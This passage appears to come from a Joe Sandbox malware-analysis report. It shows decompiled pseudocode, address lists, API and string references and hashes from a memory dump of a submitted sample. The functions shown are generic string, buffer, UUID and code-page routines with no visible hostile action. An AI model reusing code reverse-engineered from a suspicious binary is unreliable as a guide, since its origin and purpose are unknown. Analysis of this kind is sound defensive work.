										__eflags =  *((intOrPtr*)(_t187 + 0x14)) - 8;
										if( *((intOrPtr*)(_t187 + 0x14)) >= 8) {
											_t187 =  *_t187;
										}
										_t177 = _a8;
										__eflags = _t224 - _t177;
										_t241 =  <  ? _t224 : _t177;
										__eflags = _t241;
										if(_t241 == 0) {
											L98:
											_t107 = 0;
											__eflags = 0;
										} else {
											_t207 = _a4;
											while(1) {
												__eflags =  *_t187 -  *_t207;
												if( *_t187 !=  *_t207) {
													break;
												}
												_t187 = _t187 + 2;
												_t207 = _t207 + 2;
												_t241 = _t241 - 1;
												__eflags = _t241;
												if(_t241 != 0) {
													continue;
												} else {
													goto L98;
												}
												goto L99;
											}
											_t111 =  *_t187 & 0x0000ffff;
											__eflags = _t111 -  *_t207;
											asm("sbb eax, eax");
											_t107 = (_t111 & 0xfffffffe) + 1;
										}
										L99:
										__eflags = _t107;
										if(_t107 != 0) {
											L104:
											return _t107;
										} else {
											__eflags = _t224 - _t177;
											if(_t224 >= _t177) {
												__eflags = _t224 - _t177;
												_t100 = _t224 != _t177;
												__eflags = _t100;
												_t107 = 0 | _t100;
												goto L104;
											} else {
												_t109 = _t107 | 0xffffffff;
												__eflags = _t109;
												return _t109;
											}
										}
									} else {
										_t210 = _t209 - _t176;
										_v16 = _t210;
										__eflags = _t187 - _t176;
										if(_t187 < _t176) {
											_t128 =  *((intOrPtr*)(_t239 + 0x14));
											__eflags = _t128 - 8;
											if(_t128 < 8) {
												_a4 = _t239;
											} else {
												_a4 =  *_t239;
												_t222 = _a8;
											}
											__eflags = _t128 - 8;
											if(_t128 < 8) {
												_v12 = _t239;
											} else {
												_v12 =  *_t239;
											}
											__eflags = _t210;
											if(_t210 != 0) {
												E004205A0(_v12 + (_v0 + _t187) * 2, _a4 + (_v0 + _t176) * 2, _t210 + _t210);
												_t222 = _a8;
												_t253 = _t253 + 0xc;
												_t187 = _a12;
											}
										}
										__eflags = _t187;
										if(_t187 != 0) {
											L73:
											_a4 = _t187 - _t176 +  *(_t239 + 0x10);
											_t116 = E00415D50(_t176, _t239, _t222, _t239, _t187 - _t176 +  *(_t239 + 0x10), 0);
											__eflags = _t116;
											if(_t116 != 0) {
												_t191 = _a12;
												__eflags = _t176 - _t191;
												if(_t176 >= _t191) {
													_t182 = _v0;
												} else {
													_t122 =  *((intOrPtr*)(_t239 + 0x14));
													__eflags = _t122 - 8;
													if(_t122 < 8) {
														_t212 = _t239;
													} else {
														_t212 =  *_t239;
													}
													__eflags = _t122 - 8;
													if(_t122 < 8) {
														_a8 = _t239;
													} else {
														_a8 =  *_t239;
													}
													_t182 = _v0;
													E0040B600(_a8 + (_v0 + _t191) * 2, _t212 + (_v0 + _t176) * 2, _v16);
													_t191 = _a12;
													_t253 = _t253 + 4;
												}
												__eflags =  *((intOrPtr*)(_t239 + 0x14)) - 8;
												if( *((intOrPtr*)(_t239 + 0x14)) < 8) {
													_t211 = _t239;
												} else {
													_t211 =  *_t239;
												}
												__eflags = _t191;
												if(_t191 != 0) {
													E0042D8D0(_t211 + _t182 * 2, _t222, _t191 + _t191);
												}
												E00414DF0(_t239, _a4);
											}
										} else {
											__eflags = _t176;
											if(_t176 != 0) {
												goto L73;
											}
										}
										return _t239;
									}
								}
							} else {
								_t196 =  *((intOrPtr*)(_t239 + 0x14));
								__eflags = _t196 - 8;
								if(_t196 < 8) {
									_t136 = _t239;
								} else {
									_t136 =  *_t239;
								}
								__eflags = _t222 - _t136;
								if(_t222 < _t136) {
									goto L60;
								} else {
									__eflags = _t196 - 8;
									if(_t196 < 8) {
										_t215 = _t239;
									} else {
										_t215 =  *_t239;
									}
									_t137 =  *(_t239 + 0x10);
									__eflags = _t215 + _t137 * 2 - _t222;
									if(_t215 + _t137 * 2 <= _t222) {
										goto L60;
									} else {
										__eflags = _t196 - 8;
										if(_t196 < 8) {
											_t139 = _t239;
										} else {
											_t139 =  *_t239;
										}
										__eflags = _t222 - _t139;
										return E00414920(_t176, _t239, _t222 - _t139 >> 1, _t239, _v0, _a4, _t239, _t222 - _t139 >> 1, _a12);
									}
								}
							}
						} else {
							_t218 = _t217 - _t221;
							_v8 = _t218;
							__eflags = _t176 - _t221;
							if(_t176 < _t221) {
								_t162 =  *((intOrPtr*)(_t238 + 0x14));
								__eflags = _t162 - 0x10;
								if(_t162 < 0x10) {
									_a8 = _t238;
								} else {
									_a8 =  *_t238;
								}
								__eflags = _t162 - 0x10;
								if(_t162 < 0x10) {
									_a16 = _t238;
								} else {
									_a16 =  *_t238;
								}
								__eflags = _t218;
								if(_t218 != 0) {
									__eflags = _a16 + _a4 + _t176;
									E004205A0(_a16 + _a4 + _t176, _a8 + _a4 + _t221, _t218);
									_t252 = _t252 + 0xc;
								}
							}
							__eflags = _t176;
							if(_t176 != 0) {
								L26:
								_push(0);
								_a16 = _t176 - _t221 +  *((intOrPtr*)(_t238 + 0x10));
								_t146 = E00415810(_t176, _t238, _t221, _t176 - _t221 +  *((intOrPtr*)(_t238 + 0x10)));
								__eflags = _t146;
								if(_t146 == 0) {
									goto L44;
								} else {
									__eflags = _t221 - _t176;
									if(_t221 < _t176) {
										_t154 =  *((intOrPtr*)(_t238 + 0x14));
										__eflags = _t154 - 0x10;
										if(_t154 < 0x10) {
											_a8 = _t238;
										} else {
											_a8 =  *_t238;
										}
										__eflags = _t154 - 0x10;
										if(_t154 < 0x10) {
											_t219 = _t238;
										} else {
											_t219 =  *_t238;
										}
										_t155 = _v8;
										__eflags = _t155;
										if(_t155 != 0) {
											__eflags = _t219 + _a4 + _t176;
											E004205A0(_t219 + _a4 + _t176, _a8 + _a4 + _t221, _t155);
											_t252 = _t252 + 0xc;
										}
									}
									__eflags =  *((intOrPtr*)(_t238 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t238 + 0x14)) < 0x10) {
										_t199 = _t238;
									} else {
										_t199 =  *_t238;
									}
									__eflags = _t176;
									if(_t176 != 0) {
										__eflags = _a4 + _t199;
										E0042D8D0(_a4 + _t199, _a12, _t176);
									}
									__eflags =  *((intOrPtr*)(_t238 + 0x14)) - 0x10;
									_t200 = _a16;
									 *((intOrPtr*)(_t238 + 0x10)) = _t200;
									if( *((intOrPtr*)(_t238 + 0x14)) < 0x10) {
										 *((char*)(_t238 + _t200)) = 0;
										goto L44;
									} else {
										 *((char*)( *_t238 + _t200)) = 0;
										return _t238;
									}
								}
							} else {
								__eflags = _t221;
								if(_t221 == 0) {
									L44:
									return _t238;
								} else {
									goto L26;
								}
							}
						}
					}
				} else {
					_t204 =  *((intOrPtr*)(__ecx + 0x14));
					if(_t204 < 0x10) {
						_t171 = __ecx;
					} else {
						_t171 =  *((intOrPtr*)(__ecx));
					}
					if(_t206 < _t171) {
						goto L13;
					} else {
						if(_t204 < 0x10) {
							_t221 = _t238;
						} else {
							_t221 =  *_t238;
						}
						if( *((intOrPtr*)(_t238 + 0x10)) + _t221 <= _t206) {
							goto L13;
						} else {
							if(_t204 < 0x10) {
								_t174 = _t238;
							} else {
								_t174 =  *_t238;
							}
							return E00418000(_t176, _t238, _t221, _t238, _a4, _a8, _t238, _t206 - _t174, _a16);
						}
					}
				}
			}

0x00417ba0
0x00417ba3
0x00417ba4
0x00417ba8
0x00417baa
0x00417bad
0x00417bfc
0x00417bfc
0x00417bff
0x00417c02
0x00417c04
0x00417d2c
0x00417d31
0x00000000
0x00417c0a
0x00417c0a
0x00417c0f
0x00417c11
0x00417c13
0x00417c14
0x00417c17
0x00417c1d
0x00417c21
0x00417c23
0x00417d36
0x00417d36
0x00417d3b
0x00417d40
0x00417d41
0x00417d42
0x00417d43
0x00417d44
0x00417d45
0x00417d46
0x00417d47
0x00417d48
0x00417d49
0x00417d4a
0x00417d4b
0x00417d4c
0x00417d4d
0x00417d4e
0x00417d4f
0x00417d51
0x00417d53
0x00417d56
0x00417d57
0x00417d58
0x00417d5b
0x00417d5d
0x00417d5f
0x00417db1
0x00417db1
0x00417db4
0x00417db7
0x00417db9
0x00417edf
0x00417ee4
0x00000000
0x00417dbf
0x00417dc1
0x00417dc3
0x00417dc6
0x00417dc7
0x00417dca
0x00417dcc
0x00417dcf
0x00417dd1
0x00417dd9
0x00417ddc
0x00417ee9
0x00417ee9
0x00417eee
0x00417ef3
0x00417ef4
0x00417ef5
0x00417ef6
0x00417ef7
0x00417ef8
0x00417ef9
0x00417efa
0x00417efb
0x00417efc
0x00417efd
0x00417efe
0x00417eff
0x00417f00
0x00417f03
0x00417f04
0x00417f05
0x00417f06
0x00417f09
0x00417f0c
0x00417f10
0x00417f14
0x00417f16
0x00417f16
0x00417f18
0x00417f1b
0x00417f1f
0x00417f22
0x00417f24
0x00417f41
0x00417f41
0x00417f41
0x00417f26
0x00417f26
0x00417f30
0x00417f33
0x00417f36
0x00000000
0x00000000
0x00417f38
0x00417f3b
0x00417f3e
0x00417f3e
0x00417f3f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00417f3f
0x00417f55
0x00417f58
0x00417f5b
0x00417f60
0x00417f60
0x00417f43
0x00417f43
0x00417f45
0x00417f6a
0x00417f6e
0x00417f47
0x00417f47
0x00417f49
0x00417f65
0x00417f67
0x00417f67
0x00417f67
0x00000000
0x00417f4b
0x00417f4d
0x00417f4d
0x00417f52
0x00417f52
0x00417f49
0x00417de2
0x00417de2
0x00417de4
0x00417de7
0x00417de9
0x00417deb
0x00417dee
0x00417df1
0x00417dfd
0x00417df3
0x00417df5
0x00417df8
0x00417df8
0x00417e00
0x00417e03
0x00417e0c
0x00417e05
0x00417e07
0x00417e07
0x00417e0f
0x00417e11
0x00417e2e
0x00417e33
0x00417e36
0x00417e39
0x00417e39
0x00417e11
0x00417e3c
0x00417e3e
0x00417e48
0x00417e4f
0x00417e55
0x00417e5a
0x00417e5c
0x00417e5e
0x00417e61
0x00417e63
0x00417ea6
0x00417e65
0x00417e65
0x00417e68
0x00417e6b
0x00417e71
0x00417e6d
0x00417e6d
0x00417e6d
0x00417e73
0x00417e76
0x00417e7f
0x00417e78
0x00417e7a
0x00417e7a
0x00417e8a
0x00417e99
0x00417e9e
0x00417ea1
0x00417ea1
0x00417ea9
0x00417ead
0x00417eb3
0x00417eaf
0x00417eaf
0x00417eaf
0x00417eb5
0x00417eb7
0x00417ec2
0x00417ec7
0x00417ecf
0x00417ecf
0x00417e40
0x00417e40
0x00417e42
0x00000000
0x00000000
0x00417e42
0x00417edc
0x00417edc
0x00417ddc
0x00417d61
0x00417d61
0x00417d64
0x00417d67
0x00417d6d
0x00417d69
0x00417d69
0x00417d69
0x00417d6f
0x00417d71
0x00000000
0x00417d73
0x00417d73
0x00417d76
0x00417d7c
0x00417d78
0x00417d78
0x00417d78
0x00417d7e
0x00417d84
0x00417d86
0x00000000
0x00417d88
0x00417d88
0x00417d8b
0x00417d91
0x00417d8d
0x00417d8d
0x00417d8d
0x00417d96
0x00417dae
0x00417dae
0x00417d86
0x00417d71
0x00417c29
0x00417c29
0x00417c2b
0x00417c2e
0x00417c30
0x00417c32
0x00417c35
0x00417c38
0x00417c41
0x00417c3a
0x00417c3c
0x00417c3c
0x00417c44
0x00417c47
0x00417c50
0x00417c49
0x00417c4b
0x00417c4b
0x00417c53
0x00417c55
0x00417c67
0x00417c6a
0x00417c6f
0x00417c6f
0x00417c55
0x00417c72
0x00417c74
0x00417c7e
0x00417c87
0x00417c8a
0x00417c8d
0x00417c92
0x00417c94
0x00000000
0x00417c9a
0x00417c9a
0x00417c9c
0x00417c9e
0x00417ca1
0x00417ca4
0x00417cad
0x00417ca6
0x00417ca8
0x00417ca8
0x00417cb0
0x00417cb3
0x00417cb9
0x00417cb5
0x00417cb5
0x00417cb5
0x00417cbb
0x00417cbe
0x00417cc0
0x00417cd1
0x00417cd4
0x00417cd9
0x00417cd9
0x00417cc0
0x00417cdc
0x00417ce0
0x00417ce6
0x00417ce2
0x00417ce2
0x00417ce2
0x00417ce8
0x00417cea
0x00417cf3
0x00417cf6
0x00417cfb
0x00417cfe
0x00417d02
0x00417d05
0x00417d08
0x00417d1d
0x00000000
0x00417d0a
0x00417d0e
0x00417d18
0x00417d18
0x00417d08
0x00417c76
0x00417c76
0x00417c78
0x00417d21
0x00417d29
0x00000000
0x00000000
0x00000000
0x00417c78
0x00417c74
0x00417c23
0x00417baf
0x00417baf
0x00417bb5
0x00417bbb
0x00417bb7
0x00417bb7
0x00417bb7
0x00417bbf
0x00000000
0x00417bc1
0x00417bc4
0x00417bca
0x00417bc6
0x00417bc6
0x00417bc6
0x00417bd3
0x00000000
0x00417bd5
0x00417bd8
0x00417bde
0x00417bda
0x00417bda
0x00417bda
0x00417bf9
0x00417bf9
0x00417bd3
0x00417bbf

APIs

_memmove.LIBCMT ref: 00417C6A
_memmove.LIBCMT ref: 00417CD4

Strings

string too long, xrefs: 00417D36
invalid string position, xrefs: 00417D2C

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9

Uniqueness

Uniqueness Score: -1.00%

Function 00414160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00414160(signed int __eax, void* __ebx, intOrPtr* __ecx, signed int __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr* _v20;
				void* __ebp;
				intOrPtr* _t24;
				intOrPtr _t31;
				intOrPtr* _t34;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t48;
				intOrPtr* _t51;
				intOrPtr _t53;
				intOrPtr* _t56;
				intOrPtr* _t57;
				signed int _t59;
				void* _t60;
				intOrPtr* _t63;
				void* _t67;

				_push(__ecx);
				_push(__ebx);
				_t63 = __ecx;
				_push(__edi);
				_t59 = __edi | 0xffffffff;
				_t51 =  *((intOrPtr*)(__ecx + 0x10));
				if(_t51 < _a4) {
					L32:
					_push("invalid string position");
					E0044F26C(__eflags);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					__eflags =  *((intOrPtr*)(_t51 + 0x14)) - 0x10;
					_t24 = _v20;
					if( *((intOrPtr*)(_t51 + 0x14)) >= 0x10) {
						_t51 =  *_t51;
					}
					 *_t24 = _t51;
					return _t24;
				} else {
					_t48 = _a8;
					_t5 = _t48 + 0x10; // 0xcccccccc
					_t60 =  <  ?  *_t5 : _t59;
					if((__eax | 0xffffffff) - _t51 <= _t60) {
						_push("string too long");
						E0044F23E(__eflags);
						goto L32;
					} else {
						if(_t60 != 0) {
							_push(0);
							_v8 = _t51 + _t60;
							if(E00415810(_t48, __ecx, _t60, _t51 + _t60) != 0) {
								_t31 =  *((intOrPtr*)(__ecx + 0x14));
								if(_t31 < 0x10) {
									_a8 = __ecx;
								} else {
									_a8 =  *__ecx;
								}
								if(_t31 < 0x10) {
									_t56 = _t63;
								} else {
									_t56 =  *_t63;
								}
								_t53 = _a4;
								_t33 =  *((intOrPtr*)(_t63 + 0x10)) != _t53;
								if( *((intOrPtr*)(_t63 + 0x10)) != _t53) {
									E004205A0(_t56 + _t53 + _t60, _a8 + _t53, _t33);
									_t53 = _a4;
									_t67 = _t67 + 0xc;
								}
								if(_t63 != _t48) {
									__eflags =  *((intOrPtr*)(_t48 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t48 + 0x14)) >= 0x10) {
										_t48 =  *_t48;
									}
									__eflags =  *((intOrPtr*)(_t63 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t63 + 0x14)) < 0x10) {
										_t34 = _t63;
									} else {
										_t34 =  *_t63;
									}
									__eflags = _t60;
									if(_t60 != 0) {
										__eflags = _t34 + _t53;
										E0042D8D0(_t34 + _t53, _t48, _t60);
										goto L28;
									}
								} else {
									_t38 =  *((intOrPtr*)(_t63 + 0x14));
									if(_t38 < 0x10) {
										_t57 = _t63;
									} else {
										_t57 =  *_t63;
									}
									if(_t38 < 0x10) {
										_t39 = _t63;
									} else {
										_t39 =  *_t63;
									}
									if(_t60 != 0) {
										E004205A0(_t39 + _t53, _t57, _t60);
										L28:
									}
								}
								E00414460(_t63, _v8);
							}
						}
						return _t63;
					}
				}
			}

0x00414163
0x00414164
0x00414166
0x00414168
0x00414169
0x0041416c
0x00414172
0x00414260
0x00414260
0x00414265
0x0041426a
0x0041426b
0x0041426c
0x0041426d
0x0041426e
0x0041426f
0x00414273
0x00414277
0x0041427a
0x0041427c
0x0041427c
0x0041427e
0x00414281
0x00414178
0x00414178
0x0041417f
0x0041417f
0x0041418a
0x00414256
0x0041425b
0x00000000
0x00414190
0x00414192
0x0041419d
0x004141a0
0x004141aa
0x004141b0
0x004141b6
0x004141bf
0x004141b8
0x004141ba
0x004141ba
0x004141c5
0x004141cb
0x004141c7
0x004141c7
0x004141c7
0x004141d0
0x004141d3
0x004141d5
0x004141e4
0x004141e9
0x004141ec
0x004141ec
0x004141f1
0x0041421c
0x00414220
0x00414222
0x00414222
0x00414224
0x00414228
0x0041422e
0x0041422a
0x0041422a
0x0041422a
0x00414230
0x00414232
0x00414235
0x00414239
0x00000000
0x00414239
0x004141f3
0x004141f3
0x004141f9
0x004141ff
0x004141fb
0x004141fb
0x004141fb
0x00414204
0x0041420a
0x00414206
0x00414206
0x00414206
0x0041420e
0x00414215
0x0041423e
0x0041423e
0x0041420e
0x00414246
0x00414246
0x004141aa
0x00414253
0x00414253
0x0041418a

APIs

_memmove.LIBCMT ref: 004141E4
_memmove.LIBCMT ref: 00414215

Strings

string too long, xrefs: 00414256
invalid string position, xrefs: 00414260

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0045AD50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E0045AD50(void* __ebx, void* __edx, void* __ebp, char _a4, char _a8) {
				void* __edi;
				intOrPtr _t17;
				intOrPtr _t18;
				signed int _t36;
				intOrPtr _t44;
				intOrPtr* _t45;
				intOrPtr _t46;

				_t48 = __ebp;
				_t1 =  &_a8; // 0x463743
				_t46 =  *_t1;
				_t2 =  &_a4; // 0x463743
				_t45 =  *_t2;
				_t39 =  *_t45;
				if( *_t45 >= _t46) {
					L3:
					 *_t45 = _t46;
					return _t46;
				} else {
					if( *(_t45 + 8) < _t46) {
						__eflags = _t46 - 0x5ffffffc;
						if(__eflags <= 0) {
							_t17 =  *((intOrPtr*)(_t45 + 4));
							_push(__ebx);
							_t36 = 0xaaaaaaab * (_t46 + 3) >> 0x20 >> 1 << 2;
							__eflags = _t17;
							if(_t17 != 0) {
								_t18 = E00454F30(_t17, _t36, ".\\crypto\\buffer\\buffer.c", 0x7b);
							} else {
								_t18 = E00454E50(_t36, ".\\crypto\\buffer\\buffer.c", 0x79);
							}
							_t44 = _t18;
							__eflags = _t44;
							if(__eflags != 0) {
								__eflags = _t46 -  *_t45;
								 *((intOrPtr*)(_t45 + 4)) = _t44;
								 *(_t45 + 8) = _t36;
								E0042B420( *_t45 + _t44, 0, _t46 -  *_t45);
								 *_t45 = _t46;
								return _t46;
							} else {
								E004512D0(_t36, _t44, _t45, _t48, __eflags, 7, 0x64, 0x41, ".\\crypto\\buffer\\buffer.c", 0x7e);
								__eflags = 0;
								return 0;
							}
						} else {
							E004512D0(__ebx, __edx, _t45, __ebp, __eflags, 7, 0x64, 0x41, ".\\crypto\\buffer\\buffer.c", 0x74);
							__eflags = 0;
							return 0;
						}
					} else {
						E0042B420( *((intOrPtr*)(_t45 + 4)) + _t39, 0, _t46 - _t39);
						goto L3;
					}
				}
			}

0x0045ad50
0x0045ad51
0x0045ad51
0x0045ad56
0x0045ad56
0x0045ad5a
0x0045ad5e
0x0045ad7a
0x0045ad7a
0x0045ad80
0x0045ad60
0x0045ad63
0x0045ad81
0x0045ad87
0x0045adad
0x0045adb0
0x0045adb5
0x0045adb8
0x0045adba
0x0045add7
0x0045adbc
0x0045adc4
0x0045adc9
0x0045addf
0x0045ade1
0x0045ade3
0x0045ae06
0x0045ae08
0x0045ae11
0x0045ae15
0x0045ae1d
0x0045ae24
0x0045ade5
0x0045adf2
0x0045adfa
0x0045ae01
0x0045ae01
0x0045ad89
0x0045ad96
0x0045ad9e
0x0045ada2
0x0045ada2
0x0045ad65
0x0045ad72
0x00000000
0x0045ad77
0x0045ad63

APIs

_memset.LIBCMT ref: 0045AD72
_memset.LIBCMT ref: 0045AE15

Strings

.\crypto\buffer\buffer.c, xrefs: 0045AD8B, 0045ADBE, 0045ADD0, 0045ADE7
C7F, xrefs: 0045AD51, 0045AD56, 0045AD69, 0045AE0B, 0045AE14

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: _memset
String ID: .\crypto\buffer\buffer.c$C7F
API String ID: 2102423945-2013712220
Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E0040C5C0(void* __ebx, char* __ecx) {
				intOrPtr _v20;
				char _v24;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr* _v64;
				char _v72;
				intOrPtr _v76;
				void* __edi;
				char* _t19;
				intOrPtr _t24;
				void* _t31;
				intOrPtr* _t34;
				void* _t35;
				intOrPtr* _t38;
				void* _t39;
				void* _t42;
				char* _t43;

				_t31 = __ebx;
				_t19 =  &_v44;
				_v48 = 0;
				_t43 = __ecx;
				__imp__UuidCreate(_t19, _t39, _t42);
				if(_t19 != 0) {
					L9:
					_push(0x24);
					 *((intOrPtr*)(_t43 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t43 + 0x10)) = 0;
					 *_t43 = 0;
					E004156D0(_t31, _t43, _t39, "8a4577dc-de55-4eb5-b48a-8a3eee60cd95");
					goto L10;
				} else {
					_v56 = _t19;
					__imp__UuidToStringA( &_v48,  &_v56);
					_t38 = _v64;
					if(_t38 == 0) {
						goto L9;
					} else {
						_v20 = 0xf;
						_v24 = 0;
						_v40 = 0;
						if( *_t38 != 0) {
							_t34 = _t38;
							_t39 = _t34 + 1;
							do {
								_t24 =  *_t34;
								_t34 = _t34 + 1;
							} while (_t24 != 0);
							_t35 = _t34 - _t39;
						} else {
							_t35 = 0;
						}
						E004156D0(_t31,  &_v40, _t39, _t38);
						__imp__RpcStringFreeA( &_v72, _t35);
						_v76 = 0;
						E00412CA0(_t43,  &_v52);
						if(_v36 < 0x10) {
							L10:
							return _t43;
						} else {
							L00422587(_v48);
							return _t43;
						}
					}
				}
			}

0x0040c5c0
0x0040c5cb
0x0040c5cf
0x0040c5d8
0x0040c5da
0x0040c5e2
0x0040c675
0x0040c675
0x0040c677
0x0040c680
0x0040c68c
0x0040c68f
0x00000000
0x0040c5e8
0x0040c5e8
0x0040c5f6
0x0040c5fc
0x0040c602
0x00000000
0x0040c604
0x0040c604
0x0040c60c
0x0040c614
0x0040c61c
0x0040c622
0x0040c624
0x0040c627
0x0040c627
0x0040c629
0x0040c62a
0x0040c62e
0x0040c61e
0x0040c61e
0x0040c61e
0x0040c636
0x0040c640
0x0040c64a
0x0040c655
0x0040c65f
0x0040c694
0x0040c69b
0x0040c661
0x0040c665
0x0040c674
0x0040c674
0x0040c65f
0x0040c602

APIs

UuidCreate.RPCRT4(?), ref: 0040C5DA
UuidToStringA.RPCRT4(?,?), ref: 0040C5F6
RpcStringFreeA.RPCRT4(?), ref: 0040C640

Strings

8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: StringUuid$CreateFree
String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
API String ID: 3044360575-2335240114
Opcode ID: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
Opcode Fuzzy Hash: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A

Uniqueness

Uniqueness Score: -1.00%

Function 00437A2D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00437A2D(char _a4, intOrPtr _a8) {
				intOrPtr _t12;
				short* _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E00437413(_t28, ?str?) != 0) {
					if(E00437413(_t28, ?str?) != 0) {
						return E00423C92(_t28);
					}
					if(E0043884E(_a8 + 0x250, 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(E0043884E(_a8 + 0x250, 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t12 = _a4;
				if(_t12 == 0) {
					return GetACP();
				}
				return _t12;
			}

0x00437a31
0x00437a36
0x00437a5e
0x00000000
0x00437a8c
0x00437a7e
0x00437aaf
0x00000000
0x00437aaf
0x00000000
0x00437a80
0x00437aad
0x00000000
0x00000000
0x00437ab3
0x00437ab8
0x00437abc
0x00437abc
0x00437a85

APIs

_wcscmp.LIBCMT ref: 00437A44
_wcscmp.LIBCMT ref: 00437A55

Strings

OCP, xrefs: 00437A4F
ACP, xrefs: 00437A3E

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: _wcscmp
String ID: ACP$OCP
API String ID: 856254489-711371036
Opcode ID: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
Instruction ID: be6dee110b44ec76455643647cb0bd3c477e6d53c765760a4e3a4e904bc1756d
Opcode Fuzzy Hash: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
Instruction Fuzzy Hash: EF01C4A2608215B6EB34BA59DC42FAE37899F0C3A4F105417F948D6281F77CEB4042DC

Uniqueness

Uniqueness Score: -1.00%

Function 0040C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E0040C470(void* __ebx, CHAR* __ecx, void* __edx) {
				char _v264;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t4;
				void* _t17;
				CHAR* _t18;
				void* _t20;

				_t17 = __edx;
